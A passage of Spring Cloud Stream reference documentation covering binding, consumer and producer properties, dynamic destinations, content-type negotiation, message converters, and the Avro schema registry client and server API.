`true`, this property instructs binders to completely ignore the bound services and rely on Spring Boot properties (for example, relying on the `spring.rabbitmq.*` properties provided in the environment for the RabbitMQ binder).\nThe typical usage of this property is to be nested in a customized environment <<multiple-systems, when connecting to multiple systems>>.\n+\nDefault: `false`.\n\nspring.cloud.stream.bindingRetryInterval::\nThe interval (in seconds) between retrying binding creation when, for example, the binder does not support late binding and the broker (for example, Apache Kafka) is down.\nSet it to zero to treat such conditions as fatal, preventing the application from starting.\n+\nDefault: `30`\n\n[[binding-properties]]\n=== Binding Properties\n\nBinding properties are supplied by using the format of `spring.cloud.stream.bindings.<channelName>.<property>=<value>`.\nThe `<channelName>` represents the name of the channel being configured (for example, `output` for a `Source`).\n\nTo avoid repetition, Spring Cloud Stream supports setting values for all channels, in the format of `spring.cloud.stream.default.<property>=<value>`.\n\nWhen it comes to avoiding repetitions for extended binding properties, this format should be used - `spring.cloud.stream.<binder-type>.default.<producer|consumer>.<property>=<value>`.\n\nIn what follows, we indicate where we have omitted the `spring.cloud.stream.bindings.<channelName>.` prefix and focus just on the property name, with the understanding that the prefix ise included at runtime.\n\n==== Common Binding Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.config.BindingProperties`\n\nThe following binding properties are available for both input and output bindings and must be prefixed with `spring.cloud.stream.bindings.<channelName>.` (for example, `spring.cloud.stream.bindings.input.destination=ticktock`).\n\nDefault values can be set by using the `spring.cloud.stream.default` prefix (for example`spring.cloud.stream.default.contentType=application\/json`).\n\ndestination::\nThe target destination of a channel on the bound middleware (for example, the RabbitMQ exchange or Kafka topic).\nIf the channel is bound as a consumer, it could be bound to multiple destinations, and the destination names can be specified as comma-separated `String` values.\nIf not set, the channel name is used instead.\nThe default value of this property cannot be overridden.\ngroup::\nThe consumer group of the channel.\nApplies only to inbound bindings.\nSee <<consumer-groups,Consumer Groups>>.\n+\nDefault: `null` (indicating an anonymous consumer).\ncontentType::\nThe content type of the channel.\nSee \"`<<content-type-management>>`\".\n+\nDefault: `application\/json`.\nbinder::\nThe binder used by this binding.\nSee \"`<<multiple-binders>>`\" for details.\n+\nDefault: `null` (the default binder is used, if it exists).\n\n==== Consumer Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.binder.ConsumerProperties`\n\nThe following binding properties are available for input bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.consumer.` (for example, `spring.cloud.stream.bindings.input.consumer.concurrency=3`).\n\nDefault values can be set by using the `spring.cloud.stream.default.consumer` prefix (for example, `spring.cloud.stream.default.consumer.headerMode=none`).\n\nconcurrency::\nThe concurrency of the inbound consumer.\n+\nDefault: `1`.\npartitioned::\nWhether the consumer receives data from a partitioned producer.\n+\nDefault: `false`.\nheaderMode::\nWhen set to `none`, disables header parsing on input.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nThis option is useful when consuming data from non-Spring Cloud Stream applications when native headers are not supported.\nWhen set to `headers`, it uses the middleware's native header mechanism.\nWhen set to `embeddedHeaders`, it embeds headers into the message payload.\n+\nDefault: depends on the binder implementation.\nmaxAttempts::\nIf processing fails, the number of attempts to process the message (including the first).\nSet to `1` to disable retry.\n+\nDefault: `3`.\nbackOffInitialInterval::\nThe backoff initial interval on retry.\n+\nDefault: `1000`.\nbackOffMaxInterval::\nThe maximum backoff interval.\n+\nDefault: `10000`.\nbackOffMultiplier::\nThe backoff multiplier.\n+\nDefault: `2.0`.\ndefaultRetryable::\nWhether exceptions thrown by the listener that are not listed in the `retryableExceptions` are retryable.\n+\nDefault: `true`.\ninstanceIndex::\nWhen set to a value greater than equal to zero, it allows customizing the instance index of this consumer (if different from `spring.cloud.stream.instanceIndex`).\nWhen set to a negative value, it defaults to `spring.cloud.stream.instanceIndex`.\nSee \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\" for more information.\n+\nDefault: `-1`.\ninstanceCount::\nWhen set to a value greater than equal to zero, it allows customizing the instance count of this consumer (if different from `spring.cloud.stream.instanceCount`).\nWhen set to a negative value, it defaults to `spring.cloud.stream.instanceCount`.\nSee \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\" for more information.\n+\nDefault: `-1`.\nretryableExceptions::\nA map of Throwable class names in the key and a boolean in the value.\nSpecify those exceptions (and subclasses) that will or won't be retried.\nAlso see `defaultRetriable`.\nExample: `spring.cloud.stream.bindings.input.consumer.retryable-exceptions.java.lang.IllegalStateException=false`.\n+\nDefault: empty.\nuseNativeDecoding::\nWhen set to `true`, the inbound message is deserialized directly by the client library, which must be configured correspondingly (for example, setting an appropriate Kafka producer value deserializer).\nWhen this configuration is being used, the inbound message unmarshalling is not based on the `contentType` of the binding.\nWhen native decoding is used, it is the responsibility of the producer to use an appropriate encoder (for example, the Kafka producer value serializer) to serialize the outbound message.\nAlso, when native encoding and decoding is used, the `headerMode=embeddedHeaders` property is ignored and headers are not embedded in the message.\nSee the producer property `useNativeEncoding`.\n+\nDefault: `false`.\n\n\n==== Producer Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.binder.ProducerProperties`\n\nThe following binding properties are available for output bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.producer.` (for example, `spring.cloud.stream.bindings.input.producer.partitionKeyExpression=payload.id`).\n\nDefault values can be set by using the prefix `spring.cloud.stream.default.producer` (for example, `spring.cloud.stream.default.producer.partitionKeyExpression=payload.id`).\n\npartitionKeyExpression::\nA SpEL expression that determines how to partition outbound data.\nIf set, or if `partitionKeyExtractorClass` is set, outbound data on this channel is partitioned. `partitionCount` must be set to a value greater than 1 to be effective.\nMutually exclusive with `partitionKeyExtractorClass`.\nSee \"`<<partitioning>>`\".\n+\nDefault: null.\npartitionKeyExtractorClass::\nA `PartitionKeyExtractorStrategy` implementation.\nIf set, or if `partitionKeyExpression` is set, outbound data on this channel is partitioned. `partitionCount` must be set to a value greater than 1 to be effective.\nMutually exclusive with `partitionKeyExpression`.\nSee \"`<<partitioning>>`\".\n+\nDefault: `null`.\npartitionSelectorClass::\n A `PartitionSelectorStrategy` implementation.\nMutually exclusive with `partitionSelectorExpression`.\nIf neither is set, the partition is selected as the `hashCode(key) % partitionCount`, where `key` is computed through either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: `null`.\npartitionSelectorExpression::\nA SpEL expression for customizing partition selection.\nMutually exclusive with `partitionSelectorClass`.\nIf neither is set, the partition is selected as the `hashCode(key) % partitionCount`, where `key` is computed through either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: `null`.\npartitionCount::\nThe number of target partitions for the data, if partitioning is enabled.\nMust be set to a value greater than 1 if the producer is partitioned.\nOn Kafka, it is interpreted as a hint. The larger of this and the partition count of the target topic is used instead.\n+\nDefault: `1`.\nrequiredGroups::\nA comma-separated list of groups to which the producer must ensure message delivery even if they start after it has been created (for example, by pre-creating durable queues in RabbitMQ).\nheaderMode::\nWhen set to `none`, it disables header embedding on output.\nIt is effective only for messaging middleware that does not support message headers natively and requires header embedding.\nThis option is useful when producing data for non-Spring Cloud Stream applications when native headers are not supported.\nWhen set to `headers`, it uses the middleware's native header mechanism.\nWhen set to `embeddedHeaders`, it embeds headers into the message payload.\n+\nDefault: Depends on the binder implementation.\nuseNativeEncoding::\nWhen set to `true`, the outbound message is serialized directly by the client library, which must be configured correspondingly (for example, setting an appropriate Kafka producer value serializer).\nWhen this configuration is being used, the outbound message marshalling is not based on the `contentType` of the binding.\nWhen native encoding is used, it is the responsibility of the consumer to use an appropriate decoder (for example, the Kafka consumer value de-serializer) to deserialize the inbound message.\nAlso, when native encoding and decoding is used, the `headerMode=embeddedHeaders` property is ignored and headers are not embedded in the message.\nSee the consumer property `useNativeDecoding`.\n+\nDefault: `false`.\nerrorChannelEnabled::\nWhen set to `true`, if the binder supports asynchroous send results, send failures are sent to an error channel for the destination.\nSee \"`<<binder-error-channels>>`\" for more information.\n+\nDefault: `false`.\n\n[[dynamicdestination]]\n=== Using Dynamically Bound Destinations\n\nBesides the channels defined by using `@EnableBinding`, Spring Cloud Stream lets applications send messages to dynamically bound destinations.\nThis is useful, for example, when the target destination needs to be determined at runtime.\nApplications can do so by using the `BinderAwareChannelResolver` bean, registered automatically by the `@EnableBinding` annotation.\n\nThe 'spring.cloud.stream.dynamicDestinations' property can be used for restricting the dynamic destination names to a known set (whitelisting).\nIf this property is not set, any destination can be bound dynamically.\n\nThe `BinderAwareChannelResolver` can be used directly, as shown in the following example of a REST controller using a path variable to decide the target channel:\n\n[source,java]\n----\n@EnableBinding\n@Controller\npublic class SourceWithDynamicDestination {\n\n @Autowired\n private BinderAwareChannelResolver resolver;\n\n @RequestMapping(path = \"\/{target}\", method = POST, consumes = \"*\/*\")\n @ResponseStatus(HttpStatus.ACCEPTED)\n public void handleRequest(@RequestBody String body, @PathVariable(\"target\") target,\n @RequestHeader(HttpHeaders.CONTENT_TYPE) Object contentType) {\n sendMessage(body, target, contentType);\n }\n\n private void sendMessage(String body, String target, Object contentType) {\n resolver.resolveDestination(target).send(MessageBuilder.createMessage(body,\n new MessageHeaders(Collections.singletonMap(MessageHeaders.CONTENT_TYPE, contentType))));\n }\n}\n----\n\nNow consider what happens when we start the application on the default port (8080) and make the following requests with CURL:\n\n----\ncurl -H \"Content-Type: application\/json\" -X POST -d \"customer-1\" http:\/\/localhost:8080\/customers\n\ncurl -H \"Content-Type: application\/json\" -X POST -d \"order-1\" http:\/\/localhost:8080\/orders\n----\n\nThe destinations, 'customers' and 'orders', are created in the broker (in the exchange for Rabbit or in the topic for Kafka) with names of 'customers' and 'orders', and the data is published to the appropriate destinations.\n\nThe `BinderAwareChannelResolver` is a general-purpose Spring Integration `DestinationResolver` and can be injected in other components -- for example, in a router using a SpEL expression based on the `target` field of an incoming JSON message. The following example includes a router that reads SpEL expressions:\n\n[source,java]\n----\n@EnableBinding\n@Controller\npublic class SourceWithDynamicDestination {\n\n @Autowired\n private BinderAwareChannelResolver resolver;\n\n\n @RequestMapping(path = \"\/\", method = POST, consumes = \"application\/json\")\n @ResponseStatus(HttpStatus.ACCEPTED)\n public void handleRequest(@RequestBody String body, @RequestHeader(HttpHeaders.CONTENT_TYPE) Object contentType) {\n sendMessage(body, contentType);\n }\n\n private void sendMessage(Object body, Object contentType) {\n routerChannel().send(MessageBuilder.createMessage(body,\n new MessageHeaders(Collections.singletonMap(MessageHeaders.CONTENT_TYPE, contentType))));\n }\n\n @Bean(name = \"routerChannel\")\n public MessageChannel routerChannel() {\n return new DirectChannel();\n }\n\n @Bean\n @ServiceActivator(inputChannel = \"routerChannel\")\n public ExpressionEvaluatingRouter router() {\n ExpressionEvaluatingRouter router =\n new ExpressionEvaluatingRouter(new SpelExpressionParser().parseExpression(\"payload.target\"));\n router.setDefaultOutputChannelName(\"default-output\");\n router.setChannelResolver(resolver);\n return router;\n }\n}\n----\n\nThe https:\/\/github.com\/spring-cloud-stream-app-starters\/router[Router Sink Application] uses this technique to create the destinations on-demand.\n\nIf the channel names are known in advance, you can configure the producer properties as with any other destination.\nAlternatively, if you register a `NewDestinationBindingCallback<>` bean, it is invoked just before the binding is created.\nThe callback takes the generic type of the extended producer properties used by the binder.\nIt has one method:\n\n[source, java]\n----\nvoid configure(String channelName, MessageChannel channel, ProducerProperties producerProperties,\n T extendedProducerProperties);\n----\n\nThe following example shows how to use the RabbitMQ binder:\n\n[source, java]\n----\n@Bean\npublic NewDestinationBindingCallback<RabbitProducerProperties> dynamicConfigurer() {\n return (name, channel, props, extended) -> {\n props.setRequiredGroups(\"bindThisQueue\");\n extended.setQueueNameGroupOnly(true);\n extended.setAutoBindDlq(true);\n extended.setDeadLetterQueueName(\"myDLQ\");\n };\n}\n----\n\nNOTE: If you need to support dynamic destinations with multiple binder types, use `Object` for the generic type and cast the `extended` argument as needed.\n\n[[content-type-management]]\n== Content Type Negotiation\n\nData transformation is one of the core features of any message-driven microservice architecture. Given that, in Spring Cloud Stream, such data\nis represented as a Spring `Message`, a message may have to be transformed to a desired shape or size before reaching its destination. This is required for two reasons:\n\n. To convert the contents of the incoming message to match the signature of the application-provided handler.\n\n. To convert the contents of the outgoing message to the wire format.\n\nThe wire format is typically `byte[]` (that is true for the Kafka and Rabbit binders), but it is governed by the binder implementation.\n\nIn Spring Cloud Stream, message transformation is accomplished with an `org.springframework.messaging.converter.MessageConverter`.\n\nNOTE: As a supplement to the details to follow, you may also want to read the following https:\/\/spring.io\/blog\/2018\/02\/26\/spring-cloud-stream-2-0-content-type-negotiation-and-transformation[blog post].\n\n=== Mechanics\n\nTo better understand the mechanics and the necessity behind content-type negotiation, we take a look at a very simple use case by using the following message handler as an example:\n\n[source, java]\n----\n@StreamListener(Processor.INPUT)\n@SendTo(Processor.OUTPUT)\npublic String handle(Person person) {..}\n----\n\nNOTE: For simplicity, we assume that this is the only handler in the application (we assume there is no internal pipeline).\n\nThe handler shown in the preceding example expects a `Person` object as an argument and produces a `String` type as an output.\nIn order for the framework to succeed in passing the incoming `Message` as an argument to this handler, it has to somehow transform the payload of the `Message` type from the wire format to a `Person` type.\nIn other words, the framework must locate and apply the appropriate `MessageConverter`.\nTo accomplish that, the framework needs some instructions from the user.\nOne of these instructions is already provided by the signature of the handler method itself (`Person` type).\nConsequently, in theory, that should be (and, in some cases, is) enough.\nHowever, for the majority of use cases, in order to select the appropriate `MessageConverter`, the framework needs an additional piece of information.\nThat missing piece is `contentType`.\n\nSpring Cloud Stream provides three mechanisms to define `contentType` (in order of precedence):\n\n. *HEADER*: The `contentType` can be communicated through the Message itself. By providing a `contentType` header, you declare the content type to use to locate and apply the appropriate `MessageConverter`.\n\n. *BINDING*: The `contentType` can be set per destination binding by setting the `spring.cloud.stream.bindings.input.content-type` property.\n+\nNOTE: The `input` segment in the property name corresponds to the actual name of the destination (which is \u201cinput\u201d in our case). This approach lets you declare, on a per-binding basis, the content type to use to locate and apply the appropriate `MessageConverter`.\n\n. *DEFAULT*: If `contentType` is not present in the `Message` header or the binding, the default `application\/json` content type is used to\nlocate and apply the appropriate `MessageConverter`.\n\nAs mentioned earlier, the preceding list also demonstrates the order of precedence in case of a tie. For example, a header-provided content type takes precedence over any other content type.\nThe same applies for a content type set on a per-binding basis, which essentially lets you override the default content type.\nHowever, it also provides a sensible default (which was determined from community feedback).\n\nAnother reason for making `application\/json` the default stems from the interoperability requirements driven by distributed microservices architectures, where producer and consumer not only run in different JVMs but can also run on different non-JVM platforms.\n\nWhen the non-void handler method returns, if the the return value is already a `Message`, that `Message` becomes the payload. However, when the return value is not a `Message`, the new `Message` is constructed with the return value as the payload while inheriting\nheaders from the input `Message` minus the headers defined or filtered by `SpringIntegrationProperties.messageHandlerNotPropagatedHeaders`.\nBy default, there is only one header set there: `contentType`. This means that the new `Message` does not have `contentType` header set, thus ensuring that the `contentType` can evolve.\nYou can always opt out of returning a `Message` from the handler method where you can inject any header you wish.\n\nIf there is an internal pipeline, the `Message` is sent to the next handler by going through the same process of conversion. However, if there is no internal pipeline or you have reached the end of it, the `Message` is sent back to the output destination.\n\n==== Content Type versus Argument Type\n\nAs mentioned earlier, for the framework to select the appropriate `MessageConverter`, it requires argument type and, optionally, content type information.\nThe logic for selecting the appropriate `MessageConverter` resides with the argument resolvers (`HandlerMethodArgumentResolvers`), which trigger right before the invocation of the user-defined handler method (which is when the actual argument type is known to the framework).\nIf the argument type does not match the type of the current payload, the framework delegates to the stack of the\npre-configured `MessageConverters` to see if any one of them can convert the payload.\nAs you can see, the `Object fromMessage(Message<?> message, Class<?> targetClass);`\noperation of the MessageConverter takes `targetClass` as one of its arguments.\nThe framework also ensures that the provided `Message` always contains a `contentType` header.\nWhen no contentType header was already present, it injects either the per-binding `contentType` header or the default `contentType` header.\nThe combination of `contentType` argument type is the mechanism by which framework determines if message can be converted to a target type.\nIf no appropriate `MessageConverter` is found, an exception is thrown, which you can handle by adding a custom `MessageConverter` (see \"`<<spring-cloud-stream-overview-user-defined-message-converters>>`\").\n\nBut what if the payload type matches the target type declared by the handler method? In this case, there is nothing to convert, and the\npayload is passed unmodified. While this sounds pretty straightforward and logical, keep in mind handler methods that take a `Message<?>` or `Object` as an argument.\nBy declaring the target type to be `Object` (which is an `instanceof` everything in Java), you essentially forfeit the conversion process.\n\nNOTE: Do not expect `Message` to be converted into some other type based only on the `contentType`.\nRemember that the `contentType` is complementary to the target type.\nIf you wish, you can provide a hint, which `MessageConverter` may or may not take into consideration.\n\n==== Message Converters\n\n`MessageConverters` define two methods:\n\n[source, java]\n----\nObject fromMessage(Message<?> message, Class<?> targetClass);\n\nMessage<?> toMessage(Object payload, @Nullable MessageHeaders headers);\n----\n\nIt is important to understand the contract of these methods and their usage, specifically in the context of Spring Cloud Stream.\n\nThe `fromMessage` method converts an incoming `Message` to an argument type.\nThe payload of the `Message` could be any type, and it is\nup to the actual implementation of the `MessageConverter` to support multiple types.\nFor example, some JSON converter may support the payload type as `byte[]`, `String`, and others.\nThis is important when the application contains an internal pipeline (that is, input -> handler1 -> handler2 ->. . . -> output) and the output of the upstream handler results in a `Message` which may not be in the initial wire format.\n\nHowever, the `toMessage` method has a more strict contract and must always convert `Message` to the wire format: `byte[]`.\n\nSo, for all intents and purposes (and especially when implementing your own converter) you regard the two methods as having the following signatures:\n\n[source, java]\n----\nObject fromMessage(Message<?> message, Class<?> targetClass);\n\nMessage<byte[]> toMessage(Object payload, @Nullable MessageHeaders headers);\n----\n\n=== Provided MessageConverters\n\nAs mentioned earlier, the framework already provides a stack of `MessageConverters` to handle most common use cases.\nThe following list describes the provided `MessageConverters`, in order of precedence (the first `MessageConverter` that works is used):\n\n. `ApplicationJsonMessageMarshallingConverter`: Variation of the `org.springframework.messaging.converter.MappingJackson2MessageConverter`. Supports conversion of the payload of the `Message` to\/from POJO for cases when `contentType` is `application\/json` (DEFAULT).\n. `TupleJsonMessageConverter`: *DEPRECATED* Supports conversion of the payload of the `Message` to\/from `org.springframework.tuple.Tuple`.\n. `ByteArrayMessageConverter`: Supports conversion of the payload of the `Message` from `byte[]` to `byte[]` for cases when `contentType` is `application\/octet-stream`. It is essentially a pass through and exists primarily for backward compatibility.\n. `ObjectStringMessageConverter`: Supports conversion of any type to a `String` when `contentType` is `text\/plain`.\nIt invokes Object\u2019s `toString()` method or, if the payload is `byte[]`, a new `String(byte[])`.\n. `JavaSerializationMessageConverter`: *DEPRECATED* Supports conversion based on java serialization when `contentType` is `application\/x-java-serialized-object`.\n. `KryoMessageConverter`: *DEPRECATED* Supports conversion based on Kryo serialization when `contentType` is `application\/x-java-object`.\n. `JsonUnmarshallingConverter`: Similar to the `ApplicationJsonMessageMarshallingConverter`. It supports conversion of any type when `contentType` is `application\/x-java-object`.\nIt expects the actual type information to be embedded in the `contentType` as an attribute (for example, `application\/x-java-object;type=foo.bar.Cat`).\n\nWhen no appropriate converter is found, the framework throws an exception. When that happens, you should check your code and configuration and ensure you did not miss anything (that is, ensure that you provided a `contentType` by using a binding or a header).\nHowever, most likely, you found some uncommon case (such as a custom `contentType` perhaps) and the current stack of provided `MessageConverters`\ndoes not know how to convert. If that is the case, you can add custom `MessageConverter`. See <<spring-cloud-stream-overview-user-defined-message-converters>>.\n\n[[spring-cloud-stream-overview-user-defined-message-converters]]\n=== User-defined Message Converters\n\nSpring Cloud Stream exposes a mechanism to define and register additional `MessageConverters`.\nTo use it, implement `org.springframework.messaging.converter.MessageConverter`, configure it as a `@Bean`, and annotate it with `@StreamMessageConverter`.\nIt is then apended to the existing stack of `MessageConverter`s.\n\nNOTE: It is important to understand that custom `MessageConverter` implementations are added to the head of the existing stack.\nConsequently, custom `MessageConverter` implementations take precedence over the existing ones, which lets you override as well as add to the existing converters.\n\nThe following example shows how to create a message converter bean to support a new content type called `application\/bar`:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n @StreamMessageConverter\n public MessageConverter customMessageConverter() {\n return new MyCustomMessageConverter();\n }\n}\n\npublic class MyCustomMessageConverter extends AbstractMessageConverter {\n\n public MyCustomMessageConverter() {\n super(new MimeType(\"application\", \"bar\"));\n }\n\n @Override\n protected boolean supports(Class<?> clazz) {\n return (Bar.class.equals(clazz));\n }\n\n @Override\n protected Object convertFromInternal(Message<?> message, Class<?> targetClass, Object conversionHint) {\n Object payload = message.getPayload();\n return (payload instanceof Bar ? payload : new Bar((byte[]) payload));\n }\n}\n----\n\nSpring Cloud Stream also provides support for Avro-based converters and schema evolution.\nSee \"`<<schema-evolution>>`\" for details.\n\n[[schema-evolution]]\n== Schema Evolution Support\n\nSpring Cloud Stream provides support for schema evolution so that the data can be evolved over time and still work with older or newer producers and consumers and vice versa.\nMost serialization models, especially the ones that aim for portability across different platforms and languages, rely on a schema that describes how the data is serialized in the binary payload.\nIn order to serialize the data and then to interpret it, both the sending and receiving sides must have access to a schema that describes the binary format.\nIn certain cases, the schema can be inferred from the payload type on serialization or from the target type on deserialization.\nHowever, many applications benefit from having access to an explicit schema that describes the binary data format.\nA schema registry lets you store schema information in a textual format (typically JSON) and makes that information accessible to various applications that need it to receive and send data in binary format.\nA schema is referenceable as a tuple consisting of:\n\n* A subject that is the logical name of the schema\n* The schema version\n* The schema format, which describes the binary format of the data\n\nThis following sections goes through the details of various components involved in schema evolution process.\n\n=== Schema Registry Client\n\nThe client-side abstraction for interacting with schema registry servers is the `SchemaRegistryClient` interface, which has the following structure:\n\n[source,java]\n----\npublic interface SchemaRegistryClient {\n\n SchemaRegistrationResponse register(String subject, String format, String schema);\n\n String fetch(SchemaReference schemaReference);\n\n String fetch(Integer id);\n\n}\n----\n\nSpring Cloud Stream provides out-of-the-box implementations for interacting with its own schema server and for interacting with the Confluent Schema Registry.\n\nA client for the Spring Cloud Stream schema registry can be configured by using the `@EnableSchemaRegistryClient`, as follows:\n\n[source,java]\n----\n @EnableBinding(Sink.class)\n @SpringBootApplication\n @EnableSchemaRegistryClient\n public static class AvroSinkApplication {\n ...\n }\n----\n\nNOTE: The default converter is optimized to cache not only the schemas from the remote server but also the `parse()` and `toString()` methods, which are quite expensive.\nBecause of this, it uses a `DefaultSchemaRegistryClient` that does not cache responses.\nIf you intend to change the default behavior, you can use the client directly on your code and override it to the desired outcome.\nTo do so, you have to add the property `spring.cloud.stream.schemaRegistryClient.cached=true` to your application properties.\n\n==== Schema Registry Client Properties\n\nThe Schema Registry Client supports the following properties:\n\n`spring.cloud.stream.schemaRegistryClient.endpoint`:: The location of the schema-server.\nWhen setting this, use a full URL, including protocol (`http` or `https`) , port, and context path.\n+\nDefault:: `http:\/\/localhost:8990\/`\n`spring.cloud.stream.schemaRegistryClient.cached`:: Whether the client should cache schema server responses.\nNormally set to `false`, as the caching happens in the message converter.\nClients using the schema registry client should set this to `true`.\n+\nDefault:: `false`\n\n=== Avro Schema Registry Client Message Converters\n\nFor applications that have a SchemaRegistryClient bean registered with the application context, Spring Cloud Stream auto configures an Apache Avro message converter for schema management.\nThis eases schema evolution, as applications that receive messages can get easy access to a writer schema that can be reconciled with their own reader schema.\n\nFor outbound messages, if the content type of the channel is set to `application\/*+avro`, the `MessageConverter` is activated, as shown in the following example:\n\n[source,properties]\n----\nspring.cloud.stream.bindings.output.contentType=application\/*+avro\n----\n\nDuring the outbound conversion, the message converter tries to infer the schema of each outbound messages (based on its type) and register it to a subject (based on the payload type) by using the `SchemaRegistryClient`.\nIf an identical schema is already found, then a reference to it is retrieved.\nIf not, the schema is registered, and a new version number is provided.\nThe message is sent with a `contentType` header by using the following scheme: `application\/[prefix].[subject].v[version]+avro`, where `prefix` is configurable and `subject` is deduced from the payload type.\n\nFor example, a message of the type `User` might be sent as a binary payload with a content type of `application\/vnd.user.v2+avro`, where `user` is the subject and `2` is the version number.\n\nWhen receiving messages, the converter infers the schema reference from the header of the incoming message and tries to retrieve it. The schema is used as the writer schema in the deserialization process.\n\n==== Avro Schema Registry Message Converter Properties\n\nIf you have enabled Avro based schema registry client by setting `spring.cloud.stream.bindings.output.contentType=application\/*+avro`, you can customize the behavior of the registration by setting the following properties.\n\nspring.cloud.stream.schema.avro.dynamicSchemaGenerationEnabled:: Enable if you want the converter to use reflection to infer a Schema from a POJO.\n+\nDefault: `false`\n+\nspring.cloud.stream.schema.avro.readerSchema:: Avro compares schema versions by looking at a writer schema (origin payload) and a reader schema (your application payload). See the https:\/\/avro.apache.org\/docs\/1.7.6\/spec.html[Avro documentation] for more information. If set, this overrides any lookups at the schema server and uses the local schema as the reader schema.\nDefault: `null`\n+\nspring.cloud.stream.schema.avro.schemaLocations:: Registers any `.avsc` files listed in this property with the Schema Server.\n+\nDefault: `empty`\n+\nspring.cloud.stream.schema.avro.prefix:: The prefix to be used on the Content-Type header.\n+\nDefault: `vnd`\n\n=== Apache Avro Message Converters\n\nSpring Cloud Stream provides support for schema-based message converters through its `spring-cloud-stream-schema` module.\nCurrently, the only serialization format supported out of the box for schema-based message converters is Apache Avro, with more formats to be added in future versions.\n\nThe `spring-cloud-stream-schema` module contains two types of message converters that can be used for Apache Avro serialization:\n\n* Converters that use the class information of the serialized or deserialized objects or a schema with a location known at startup.\n* Converters that use a schema registry. They locate the schemas at runtime and dynamically register new schemas as domain objects evolve.\n\n=== Converters with Schema Support\n\nThe `AvroSchemaMessageConverter` supports serializing and deserializing messages either by using a predefined schema or by using the schema information available in the class (either reflectively or contained in the `SpecificRecord`).\nIf you provide a custom converter, then the default AvroSchemaMessageConverter bean is not created. The following example shows a custom converter:\n\nTo use custom converters, you can simply add it to the application context, optionally specifying one or more `MimeTypes` with which to associate it.\nThe default `MimeType` is `application\/avro`.\n\nIf the target type of the conversion is a `GenericRecord`, a schema must be set.\n\nThe following example shows how to configure a converter in a sink application by registering the Apache Avro `MessageConverter` without a predefined schema.\nIn this example, note that the mime type value is `avro\/bytes`, not the default `application\/avro`.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n public MessageConverter userMessageConverter() {\n return new AvroSchemaMessageConverter(MimeType.valueOf(\"avro\/bytes\"));\n }\n}\n----\n\nConversely, the following application registers a converter with a predefined schema (found on the classpath):\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n public MessageConverter userMessageConverter() {\n AvroSchemaMessageConverter converter = new AvroSchemaMessageConverter(MimeType.valueOf(\"avro\/bytes\"));\n converter.setSchemaLocation(new ClassPathResource(\"schemas\/User.avro\"));\n return converter;\n }\n}\n----\n\n=== Schema Registry Server\n\nSpring Cloud Stream provides a schema registry server implementation.\nTo use it, you can add the `spring-cloud-stream-schema-server` artifact to your project and use the `@EnableSchemaRegistryServer` annotation, which adds the schema registry server REST controller to your application.\nThis annotation is intended to be used with Spring Boot web applications, and the listening port of the server is controlled by the `server.port` property.\nThe `spring.cloud.stream.schema.server.path` property can be used to control the root path of the schema server (especially when it is embedded in other applications).\nThe `spring.cloud.stream.schema.server.allowSchemaDeletion` boolean property enables the deletion of a schema. By default, this is disabled.\n\nThe schema registry server uses a relational database to store the schemas.\nBy default, it uses an embedded database.\nYou can customize the schema storage by using the http:\/\/docs.spring.io\/spring-boot\/docs\/current-SNAPSHOT\/reference\/htmlsingle\/#boot-features-sql[Spring Boot SQL database and JDBC configuration options].\n\nThe following example shows a Spring Boot application that enables the schema registry:\n\n[source,java]\n----\n@SpringBootApplication\n@EnableSchemaRegistryServer\npublic class SchemaRegistryServerApplication {\n public static void main(String[] args) {\n SpringApplication.run(SchemaRegistryServerApplication.class, args);\n }\n}\n----\n\n==== Schema Registry Server API\n\nThe Schema Registry Server API consists of the following operations:\n\n* `POST \/` -- see \"`<<spring-cloud-stream-overview-registering-new-schema>>`\"\n* 'GET \/{subject}\/{format}\/{version}' -- see \"`<<spring-cloud-stream-overview-retrieve-schema-subject-format-version>>`\"\n* `GET \/{subject}\/{format}` -- see \"`<<spring-cloud-stream-overview-retrieve-schema-subject-format>>`\"\n* `GET \/schemas\/{id}` -- see \"`<<spring-cloud-stream-overview-retrieve-schema-id>>`\"\n* `DELETE \/{subject}\/{format}\/{version}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-subject-format-version>>`\"\n* `DELETE \/schemas\/{id}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-id>>`\"\n* `DELETE \/{subject}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-subject>>`\"\n\n[[spring-cloud-stream-overview-registering-new-schema]]\n===== Registering a New Schema\n\nTo register a new schema, send a `POST` request to the `\/` endpoint.\n\nThe `\/` accepts a JSON payload with the following fields:\n\n* `subject`: The schema subject\n* `format`: The schema format\n* `definition`: The schema definition\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-subject-format-version]]\n===== Retrieving an Existing Schema by Subject, Format, and Version\n\nTo retrieve an existing schema by subject, format, and version, send `GET` request to the `\/{subject}\/{format}\/{version}` endpoint.\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-subject-format]]\n===== Retrieving an Existing Schema by Subject and Format\n\nTo retrieve an existing schema by subject and format, send a `GET` request to the `\/subject\/format` endpoint.\n\nIts response is a list of schemas with each schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-id]]\n===== Retrieving an Existing Schema by ID\n\nTo retrieve a schema by its ID, send a `GET` request to the 